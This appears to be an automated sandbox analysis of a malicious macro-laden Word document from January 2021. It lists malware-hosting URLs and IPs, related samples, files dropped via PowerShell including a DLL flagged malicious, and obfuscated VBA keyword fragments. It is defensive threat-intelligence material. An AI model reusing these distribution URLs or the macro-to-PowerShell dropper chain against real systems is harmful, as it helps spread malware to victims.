                                      • 5.2.136.90/6s0p53atjr9ihwygvd/svxo4o84aueyhj9v5m/5lqp30jb/g0ur1kwrzvgj3o0gmmo/dw8my2m1fzzo/
                                      info_39534.docGet hashmaliciousBrowse
                                      • 5.2.136.90/5ciqo/dhqbj3xw/
                                      Dati_012021_688_89301.docGet hashmaliciousBrowse
                                      • 5.2.136.90/l7tybna/g7nyjudv6/gf8bykzqxpzupj/wr2o0u8id88pf7dgmx3/9zupu1q7mb/wtjo6ov5niso7jo0n/
                                      2199212_20210105_160680.docGet hashmaliciousBrowse
                                      • 5.2.136.90/vcpu82n/rvhhoco3em4jtl/qxey084opeuhirghxzs/bm8x5w07go1ogzflbv/32imx8ryeb30/bd7tg46kn/
                                      ARCHIVO_FILE.docGet hashmaliciousBrowse
                                      • 5.2.136.90/ji02pdi/39rfb96opn/
                                      doc_X_13536.docGet hashmaliciousBrowse
                                      • 5.2.136.90/glhz448zi9act/ieva/q040/sl9198fns4q2/
                                      REP380501 040121.docGet hashmaliciousBrowse
                                      • 5.2.136.90/09hsu3aavqd4/8opns7c/oxp5fp7awb/
                                      doc-20210104-0184.docGet hashmaliciousBrowse
                                      • 5.2.136.90/78ro59myn48w9a6ku/bcgjwwwuc/
                                      7823099012021.docGet hashmaliciousBrowse
                                      • 5.2.136.90/bl7bvpp8itof0dvu5j2/nwcw9ztkp/yjrulniti57vcwwk67t/6u49kr6/

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      petafilm.cominformazioni-0501-012021.docGet hashmaliciousBrowse
                                      • 176.53.69.151
                                      rapport 40329241.docGet hashmaliciousBrowse
                                      • 176.53.69.151
                                      Dati_012021_688_89301.docGet hashmaliciousBrowse
                                      • 176.53.69.151
                                      2199212_20210105_160680.docGet hashmaliciousBrowse
                                      • 176.53.69.151
                                      ARCHIVO_FILE.docGet hashmaliciousBrowse
                                      • 176.53.69.151
                                      doc_X_13536.docGet hashmaliciousBrowse
                                      • 176.53.69.151
                                      ytgeKMQNL2.docGet hashmaliciousBrowse
                                      • 176.53.69.151

                                      ASN

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      RCS-RDS73-75DrStaicoviciRODATA-480841.docGet hashmaliciousBrowse
                                      • 5.2.136.90
                                      Documenten_9274874 8574977265.docGet hashmaliciousBrowse
                                      • 5.2.136.90
                                      pack-91089 416755919.docGet hashmaliciousBrowse
                                      • 5.2.136.90
                                      Adjunto.docGet hashmaliciousBrowse
                                      • 5.2.136.90
                                      arc-NZY886292.docGet hashmaliciousBrowse
                                      • 5.2.136.90
                                      NQN0244_012021.docGet hashmaliciousBrowse
                                      • 5.2.136.90
                                      4560 2021 UE_9893.docGet hashmaliciousBrowse
                                      • 5.2.136.90
                                      Scan-0767672.docGet hashmaliciousBrowse
                                      • 5.2.136.90
                                      Documento-2021.docGet hashmaliciousBrowse
                                      • 5.2.136.90
                                      informazioni-0501-012021.docGet hashmaliciousBrowse
                                      • 5.2.136.90
                                      rapport 40329241.docGet hashmaliciousBrowse
                                      • 5.2.136.90
                                      info_39534.docGet hashmaliciousBrowse
                                      • 5.2.136.90
                                      Dati_012021_688_89301.docGet hashmaliciousBrowse
                                      • 5.2.136.90
                                      2199212_20210105_160680.docGet hashmaliciousBrowse
                                      • 5.2.136.90
                                      ARCHIVO_FILE.docGet hashmaliciousBrowse
                                      • 5.2.136.90
                                      doc_X_13536.docGet hashmaliciousBrowse
                                      • 5.2.136.90
                                      REP380501 040121.docGet hashmaliciousBrowse
                                      • 5.2.136.90
                                      doc-20210104-0184.docGet hashmaliciousBrowse
                                      • 5.2.136.90
                                      7823099012021.docGet hashmaliciousBrowse
                                      • 5.2.136.90
                                      vDKnVBINrY.exeGet hashmaliciousBrowse
                                      • 86.120.144.206
                                      RADORETRST_Heodo_ST_2021-01-05_19-42-11-017.eml_20210105Rechnung.doc_analyze.docGet hashmaliciousBrowse
                                      • 185.225.36.38
                                      informazioni-0501-012021.docGet hashmaliciousBrowse
                                      • 176.53.69.151
                                      N.11389944 BS 05 gen 2021.docGet hashmaliciousBrowse
                                      • 185.225.36.38
                                      PSX7103491.docGet hashmaliciousBrowse
                                      • 185.225.36.38
                                      Beauftragung.docGet hashmaliciousBrowse
                                      • 185.225.36.38
                                      rapport 40329241.docGet hashmaliciousBrowse
                                      • 176.53.69.151
                                      Dati_012021_688_89301.docGet hashmaliciousBrowse
                                      • 176.53.69.151
                                      2199212_20210105_160680.docGet hashmaliciousBrowse
                                      • 176.53.69.151
                                      #U00e0#U00a4#U00ac#U00e0#U00a5#U20ac#U00e0#U00a4#U0153#U00e0#U00a4#U2022.docGet hashmaliciousBrowse
                                      • 185.225.36.38
                                      ARCHIVO_FILE.docGet hashmaliciousBrowse
                                      • 176.53.69.151
                                      doc_X_13536.docGet hashmaliciousBrowse
                                      • 176.53.69.151
                                      ytgeKMQNL2.docGet hashmaliciousBrowse
                                      • 176.53.69.151
                                      vrhiyc.exeGet hashmaliciousBrowse
                                      • 46.45.148.196
                                      ucrcdh.exeGet hashmaliciousBrowse
                                      • 46.45.148.196
                                      lrbwh.exeGet hashmaliciousBrowse
                                      • 46.45.148.196
                                      ECS9522020111219400053_19280.exeGet hashmaliciousBrowse
                                      • 46.235.9.150
                                      BdBdbczoqd.exeGet hashmaliciousBrowse
                                      • 185.84.181.88
                                      N89uC6re8k.exeGet hashmaliciousBrowse
                                      • 185.84.181.89
                                      SUmXCDNE9J.exeGet hashmaliciousBrowse
                                      • 185.84.181.88
                                      amEXFGJafW.exeGet hashmaliciousBrowse
                                      • 185.84.181.88

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F52C8AA2-B174-499E-B3BD-E7523F18DF93}.tmp
                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):1024
                                      Entropy (8bit):0.05390218305374581
                                      Encrypted:false
                                      SSDEEP:3:ol3lYdn:4Wn
                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
                                      Process:C:\Windows\SysWOW64\rundll32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):46
                                      Entropy (8bit):1.0424600748477153
                                      Encrypted:false
                                      SSDEEP:3:/lbWwWl:sZ
                                      MD5:3B7B4F5326139F48EFA0AAE509E2FE58
                                      SHA1:209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
                                      SHA-256:D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
                                      SHA-512:C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview: ........................................user.
                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):74
                                      Entropy (8bit):4.37618297427639
                                      Encrypted:false
                                      SSDEEP:3:M1uTspu4oNvsspu4omX1uTspu4ov:MsTspFGUspFGTspFy
                                      MD5:1575B4B03068E9EB1C790279D6F015E9
                                      SHA1:B03BA64F155CB89C56F2BEFD4834DF9592D7FA43
                                      SHA-256:172739674EBD8866CDE6E438FF08DBC63AE51F20C6A69F78BDDCF58B1FEE33AF
                                      SHA-512:02F358E4E8C884FE42D825C68FAA8B656C9D44827F8B17207BD360C4EED0F75C233DDB00789531D1C78FC9009234C9FD0E0B9870074100CE8D1D11B9475B39A3
                                      Malicious:false
                                      Preview: [doc]..pack 2254794.LNK=0..pack 2254794.LNK=0..[doc]..pack 2254794.LNK=0..
                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\pack 2254794.LNK
                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed Aug 26 14:08:16 2020, atime=Wed Jan 6 15:48:37 2021, length=173056, window=hide
                                      Category:dropped
                                      Size (bytes):2048
                                      Entropy (8bit):4.54485733617009
                                      Encrypted:false
                                      SSDEEP:48:8y/XT0jFJ7X8ZjY17XQ/Qh2y/XT0jFJ7X8ZjY17XQ/Q/:8y/XojFJ7XIY17XQ/Qh2y/XojFJ7XIYF
                                      MD5:E3FBD587B484224CD312DA1A8614455A
                                      SHA1:E20B34A9EDFD3E61071E6D6EFC21FA59E85D4056
                                      SHA-256:C4B15C49D33DC71DBFEF56B453F4F0B791BCE90E123A0F54154E3D0C6EA17935
                                      SHA-512:E3A2F426184A78FBC82878300F15DB755A2AC3ACAB2F5EB13F47C1B3415FDCE6DAAB16D10334F398FA4EC90E7420788DE87E1ACE617C537017AB74148CFDC9AB
                                      Malicious:false
                                      Preview: L..................F.... ......{.....{..D...K................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....j.2.....&R.. .PACK22~1.DOC..N.......Q.y.Q.y*...8.....................p.a.c.k. .2.2.5.4.7.9.4...d.o.c.......z...............-...8...[............?J......C:\Users\..#...................\\405464\Users.user\Desktop\pack 2254794.doc.'.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.p.a.c.k. .2.2.5.4.7.9.4...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......405464..........D_....3N...W...9F.C...........[D_....3N...W
                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):162
                                      Entropy (8bit):2.431160061181642
                                      Encrypted:false
                                      SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                      MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                      SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                      SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                      SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                      Malicious:false
                                      Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TTTIA5RUAT24SOYOMUL4.temp
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):8016
                                      Entropy (8bit):3.588015572863861
                                      Encrypted:false
                                      SSDEEP:96:chQCsMqbqvsqvJCwo1z8hQCsMqbqvsEHyqvJCworfzv1YkHKf8OzlUVLIu:cy+o1z8yWHnorfzv+f8OoIu
                                      MD5:C0AE2CE8B209C1783BCC5D0CF773F7B1
                                      SHA1:C42001B1F8B58DB5FB3E44B6743D6B05A52B8FC2
                                      SHA-256:0A8DF82BDDA3CC1BC76384419D818EB89A6D4576954D29C15B2360B001140F38
                                      SHA-512:322BC8DE5B93082BBD69AC84DCA42E997507E91EEEF242E8281353FF4CFFCE0D3ECF73F61234358E48A032AD2DCCAA1E7882EC44F1B09B749746F8C676C24028
                                      Malicious:false
                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                      C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):192000
                                      Entropy (8bit):7.4703735707732735
                                      Encrypted:false
                                      SSDEEP:3072:SwbpDnn9FCrNyVBYF0n3ajFq4weCp2S2MJdhzybMO8dSySA:Ssl9FSaBYF0nVp2MJHybR8dS9
                                      MD5:920A3E39E71AC0FC7ECAC1630AADAF7A
                                      SHA1:2DD3A5B2521C723914D1518111AE27E1825FCD0F
                                      SHA-256:EEF95A9BB33B7458E7EA3AF95B79CDF7B5016C89B70778A6B60E71010EDADF73
                                      SHA-512:D6FE3C10742B6B40A837DC1F5B1700FDF1093243A84E80102FEE0BB45CFC43B2002E76F0F635F9C47598E67E061D70B98C1C7862A1ACC1D6832C5EBE5844192E
                                      Malicious:true
                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..wT..wT..wT......wT.....wT......wT.-....wT.-....wT..wU.SwT.-....wT......wT......wT......wT..w...wT......wT.Rich.wT.........PE..L......_...........!.........J.......E.......................................0.......................................................P.. ...............................8...............................@............................................text............................... ..`.rdata...J.......L..................@..@.data....-... ......................@....rsrc... ....P......................@..@.reloc..H...........................@..B........................................................................................................................................................................................................................................................................................................
                                      C:\Users\user\Desktop\~$ck 2254794.doc
                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):162
                                      Entropy (8bit):2.431160061181642
                                      Encrypted:false
                                      SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                      MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                      SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                      SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                      SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                      Malicious:false
                                      Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

                                      Static File Info

                                      General

                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: backing up Grove Avon systematic copy THX Steel functionalities Upgradable infrastructure Technician, Author: Clmence Nguyen, Template: Normal.dotm, Last Saved By: Quentin Collet, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 5 06:14:00 2021, Last Saved Time/Date: Tue Jan 5 06:14:00 2021, Number of Pages: 1, Number of Words: 3222, Number of Characters: 18371, Security: 8
                                      Entropy (8bit):6.685015184938068
                                      TrID:
                                      • Microsoft Word document (32009/1) 79.99%
                                      • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                      File name:pack 2254794.doc
                                      File size:172398
                                      MD5:1e1ec8dd9b25146cc2104be64d6f9bf0
                                      SHA1:d7253cfd0015dbb38c6e2bb602216468d83e4b4a
                                      SHA256:048e5df452e4ba303faa434c138839e4fdf6e8e5004ced58aa30569573eda17e
                                      SHA512:8941fa4e0ef02a23663db80b63cae810a059a711e1254ea404ed63607a56ebac5a1e7f2d86279edbe4120225b2ac0ee4e4b11071d73db7b1867140d53723be23
                                      SSDEEP:3072:59ufstRUUKSns8T00JSHUgteMJ8qMD7g5CeISWpsbP:59ufsfgIf0pL57I/8P
                                      File Content Preview:........................>......................................................................................................................................................................................................................................

                                      File Icon

                                      Icon Hash:e4eea2aaa4b4b4a4

                                      Static OLE Info

                                      General

                                      Document Type:OLE
                                      Number of OLE Files:1

                                      OLE File "pack 2254794.doc"

                                      Indicators

                                      Has Summary Info:True
                                      Application Name:Microsoft Office Word
                                      Encrypted Document:False
                                      Contains Word Document Stream:True
                                      Contains Workbook/Book Stream:False
                                      Contains PowerPoint Document Stream:False
                                      Contains Visio Document Stream:False
                                      Contains ObjectPool Stream:
                                      Flash Objects Count:
                                      Contains VBA Macros:True

                                      Summary

                                      Code Page:1252
                                      Title:
                                      Subject:backing up Grove Avon systematic copy THX Steel functionalities Upgradable infrastructure Technician
                                      Author:Clmence Nguyen
                                      Keywords:
                                      Comments:
                                      Template:Normal.dotm
                                      Last Saved By:Quentin Collet
                                      Revion Number:1
                                      Total Edit Time:0
                                      Create Time:2021-01-05 06:14:00
                                      Last Saved Time:2021-01-05 06:14:00
                                      Number of Pages:1
                                      Number of Words:3222
                                      Number of Characters:18371
                                      Creating Application:Microsoft Office Word
                                      Security:8

                                      Document Summary

                                      Document Code Page:-535
                                      Number of Lines:153
                                      Number of Paragraphs:43
                                      Thumbnail Scaling Desired:False
                                      Company:
                                      Contains Dirty Links:False
                                      Shared Document:False
                                      Changed Hyperlinks:False
                                      Application Version:917504

                                      Streams with VBA

                                      VBA File Name: Oi5oelv0_s4, Stream Size: 17886
                                      General
                                      Stream Path:Macros/VBA/Oi5oelv0_s4
                                      VBA File Name:Oi5oelv0_s4
                                      Stream Size:17886
                                      Data ASCII:. . . . . . . . . | . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . [ k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                      Data Raw:01 16 01 00 00 f0 00 00 00 7c 06 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 83 06 00 00 93 30 00 00 00 00 00 00 01 00 00 00 ae c5 5b 6b 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                      VBA Code Keywords

                                      Keyword
                                      DyjPBI
                                      dLrgANHCG
                                      EajdMLeD
                                      rgBSB
                                      Object
                                      yjNpyrf
                                      rJqMZII
                                      PGiog
                                      T_dehutl_mggmhizd
                                      EUMDPGt
                                      xkJxAAC
                                      AybxtEBCJ.Close
                                      JhiYfXc:
                                      VusSK
                                      "fUwLgjVtQyH"
                                      UUoAB.CreateTextFile("XFtOCOULb:\dMKcFHF\GAGPCEp.ZPnnAM")
                                      bGnhXCA
                                      VJbwzTDT.Close
                                      VwnpBElhO
                                      MMAqSI
                                      UPhhYZEF
                                      "bVawaPADALVlWFFA"
                                      NFWzF
                                      "HiTyACJmCuGQFFJ"
                                      sGvJJWh
                                      PmBxcD:
                                      SfMKIOk
                                      "TthascRlxHZH"
                                      AybxtEBCJ:
                                      SFmrEDJ
                                      zOBhOx
                                      fUGQf
                                      numuq
                                      rEeiBJ
                                      ChWZVJiB.CreateTextFile("gMEpHB:\SKWvYCA\YtZqA.fQoAE")
                                      RkPWCDPC
                                      JADCpjk
                                      PmBxcD
                                      pDPzBJmM
                                      bGMXEIA.CreateTextFile("grPSDMS:\lQkJoR\aZMUgjGC.pVvhaH")
                                      WSARpB
                                      EUMDPGt.Close
                                      HnBvAEH
                                      "WXovaGHxqSlUt"
                                      QEIFFM
                                      bPFNuJ.WriteLine
                                      "PzrrnIFtpmxAx"
                                      EUMDPGt:
                                      ilONFzHG
                                      "akTuJaIGmZrUyF"
                                      qpOWEIHHA
                                      yJouG
                                      XwZxsHCGt
                                      FTalMbF
                                      XDJPUW
                                      "ALpzEMcwuWl"
                                      gQxBD:
                                      UUoAB
                                      tcYiEMeRH.Close
                                      nIHrI
                                      eUdbDAHHs.WriteLine
                                      "uJnfBHIPFKBxHBmEE"
                                      FPWaF
                                      JADCpjk.WriteLine
                                      xxYeFGUAH
                                      rfDgD
                                      njKwJdA.WriteLine
                                      "bOOXnOJYtbRAbm"
                                      VJbwzTDT:
                                      RkPWCDPC:
                                      UPhhYZEF.Close
                                      eWkHqVao
                                      Resume
                                      XKPUEfhk
                                      RLurCDDF
                                      gglHam
                                      "budRDJKVnJRU"
                                      DRrKpoA
                                      "]an"
                                      lgZgGO
                                      "gcZaHCGUVJsFmL"
                                      "yKdJWHAniqHFCB"
                                      ThHBBDu
                                      tcYiEMeRH.WriteLine
                                      waSbS
                                      VfJHAA
                                      vutdEkdRL
                                      NSiRQzd
                                      "frvvJFHIkftmZHE"
                                      OtQPAJH
                                      AybxtEBCJ.WriteLine
                                      XTdPHz
                                      OBwIBy:
                                      JADCpjk.Close
                                      QZjuH
                                      "DkRmTYGAMxqHI"
                                      zOQlGPVC
                                      "dWnMFoTBPDqeJK"
                                      jPnRGLC
                                      CbMZSLFAM
                                      kboRA
                                      ORIzFDySE
                                      DRrKpoA.Close
                                      VAEDpBCV
                                      uJSEDH:
                                      QZjuH.CreateTextFile("EEGvGuF:\XrXnHGDDB\noadJZ.yGcKj")
                                      "bAurYaGPwGKRiG"
                                      bPFNuJ
                                      "koDuGqAOJBlLgZIEme"
                                      DyjPBI.CreateTextFile("OPLPBI:\fNyAExIq\jrtno.FyobBAAFE")
                                      hiZkEEF.WriteLine
                                      txKQv
                                      xCaTC.CreateTextFile("Oafyb:\RPNGMA\cmOgEyD.EEpGjE")
                                      vtDUw
                                      RkPWCDPC.WriteLine
                                      aLGptGA
                                      "kWzGMzIVefGB"
                                      "ncDMUIadusSIDx"
                                      VB_Name
                                      RkPWCDPC.Close
                                      "JCgblEAJizSfW"
                                      uJSEDH
                                      eUdbDAHHs.Close
                                      "HfXAPQQbXKJHFGu"
                                      eBddHTXP
                                      AybxtEBCJ
                                      OBwIBy
                                      RNgUODjsM.CreateTextFile("FyNFG:\ugXUH\cZIFypIHj.tRULIINC")
                                      VJbwzTDT.WriteLine
                                      ItSfCDCB
                                      Mid(Application.Name,
                                      JhiYfXc.Close
                                      PAxhJ
                                      "TJahKRWdrvHFIy"
                                      xOnWA
                                      xkJxAAC.CreateTextFile("tLvao:\aGKUA\AhQhj.BDOQSJWG")
                                      "lRcGHADAHrlHJJA"
                                      oOysMtDG
                                      syDRd
                                      dLrgANHCG.CreateTextFile("lBasV:\tFGoGJd\zBuHfBCN.AHGggII")
                                      cTfCJ
                                      hiZkEEF
                                      "GhifcDKlpA"
                                      oOysMtDG.WriteLine
                                      FgmzCEm
                                      bPFNuJ:
                                      "HwixyOCYxmojd"
                                      UMzHfyAfA
                                      oOysMtDG:
                                      "eSpcpGDZncccrFb"
                                      oMcHDXEF
                                      reTrs
                                      "BWSOKPyHMnSQxi"
                                      EJEApM
                                      JADCpjk:
                                      XjhOHEMDC
                                      gQxBD
                                      "xtsHGQjpNzDIYJ"
                                      pSFXACJ
                                      wUoJIFDD
                                      HOkLRDGd
                                      njKwJdA.Close
                                      RvFOAEPH
                                      HMyHCQCGu
                                      njKwJdA
                                      "GqMIEnOQFEEDsE"
                                      bGMXEIA
                                      eUdbDAHHs:
                                      rtGyqOth
                                      wuKBFvqI
                                      hSbDPCC
                                      hSbDPCC.CreateTextFile("pygNv:\znIpFIR\yniMs.nmiIGDEDA")
                                      rEeiBJ.CreateTextFile("VxskFWpm:\cuyOFYrFJ\SZSlaGJZi.TeBYCDZ")
                                      cSHkDL
                                      blQEM
                                      nKtfECko
                                      RUMGE
                                      Zpeehqbjjey.Create
                                      uJSEDH.WriteLine
                                      xNJyUCNg
                                      "BQumCJmmiAGIKv"
                                      yyoqEHETu
                                      GNnZJzE
                                      HnBvAEH.CreateTextFile("ehLoAm:\PAVZiAGU\jVPHv.fAgoFBYmC")
                                      yUWxTlVAC
                                      TxAVq
                                      EVOuqJnGD
                                      "cnLcFxEphoEbAFA"
                                      CksLJVJ
                                      PmBxcD.Close
                                      njKwJdA:
                                      XsKjcKE
                                      "GDTGdEJpuRnDBFQ"
                                      "ZRotGHIxyrpSqvsXCC"
                                      SOunIGkF
                                      "]anw["
                                      JhiYfXc
                                      ChWZVJiB
                                      lEOlGYxK.CreateTextFile("sojcFeJ:\zxDxYHq\rNbtS.PtHuEEP")
                                      "OnehVAaWbfCAcAjsG"
                                      iytziJ
                                      "ohaTGaUTSwwDv"
                                      "qMnfwCwbPJC"
                                      "vRrzDEngIQvFPJfE"
                                      zgBjJOGEH
                                      tcYiEMeRH:
                                      OBwIBy.Close
                                      NtpdEJDH
                                      gQxBD.WriteLine
                                      "WMwcBSqFohy"
                                      EUMDPGt.WriteLine
                                      gQxBD.Close
                                      PAxhJ.CreateTextFile("dFVzNBE:\EBCOlEEOJ\KlKcJKk.SVIvoAEqG")
                                      QrVtQr
                                      VJbwzTDT
                                      UPhhYZEF.WriteLine
                                      uJSEDH.Close
                                      Zpeehqbjjey
                                      RNgUODjsM
                                      NBjEFGnEA
                                      oOysMtDG.Close
                                      YzIkA
                                      tcYiEMeRH
                                      xxYeFGUAH.CreateTextFile("eCzvxHN:\cgVnKGAT\YcnDi.YqiJOp")
                                      "TOSxJaIzCudpDlB"
                                      fUDmDCt
                                      "utFMeJhUKJhJ"
                                      aTfPCap
                                      "SjDfYFUFPynYGu"
                                      wCjuwBBGN
                                      JHrNWdBsW
                                      bPFNuJ.Close
                                      XwZxsHCGt.CreateTextFile("TNJvoD:\walkrfAE\EalrWFWTE.wDSOEJ")
                                      "rVpvDaGGxNfeNUF"
                                      hiZkEEF.Close
                                      Nothing
                                      UPhhYZEF:
                                      IYKcgC
                                      dTtuVsDVA
                                      VcIiQJFi
                                      JhiYfXc.WriteLine
                                      "jVSXGfhYCxoHFD"
                                      lEOlGYxK
                                      "ozrZBTZBTMMIBB"
                                      hiZkEEF:
                                      "goMgGBdJMUDLAG"
                                      WtNcAKUFt
                                      "MvkIFCHFTnRqD"
                                      PmBxcD.WriteLine
                                      rgBSB.CreateTextFile("PkeJHBJJH:\ODJMGCw\NefpJHvCX.XzgyeCQuA")
                                      SynsDAgHG
                                      "PFQdBLHsDnfTZv"
                                      vitXEH
                                      "OTLmJCwhyQMFzlB"
                                      oUWfJGBeE
                                      "OcgtIFEeoIFhxt"
                                      Error
                                      "lHuxHADjraNFBgI"
                                      CCnbXRBeA
                                      AiICOj
                                      VcIiQJFi.CreateTextFile("gNgYGZ:\CatdBMGGg\qGsdAdOQH.cJsxtdJE")
                                      CmcBTTABc
                                      Attribute
                                      CHKzNBD
                                      TFXNGIiH
                                      "cGDcNrWsPeGCDF"
                                      LVadAF
                                      mmkTuwH
                                      eUdbDAHHs
                                      Function
                                      VbMBBgf
                                      MfgnKGWI
                                      ukrnIFCE
                                      EbuwEJS
                                      WxujBIAMz
                                      DRrKpoA:
                                      "dvqIBFEqwfkI"
                                      kskMAAHA
                                      OBwIBy.WriteLine
                                      xCaTC
                                      zLkRiC
                                      DRrKpoA.WriteLine
                                      "dxIGdcCHBKYgde"
                                      VBA Code
                                      VBA File Name: Qafkrimwsho, Stream Size: 697
                                      General
                                      Stream Path:Macros/VBA/Qafkrimwsho
                                      VBA File Name:Qafkrimwsho
                                      Stream Size:697
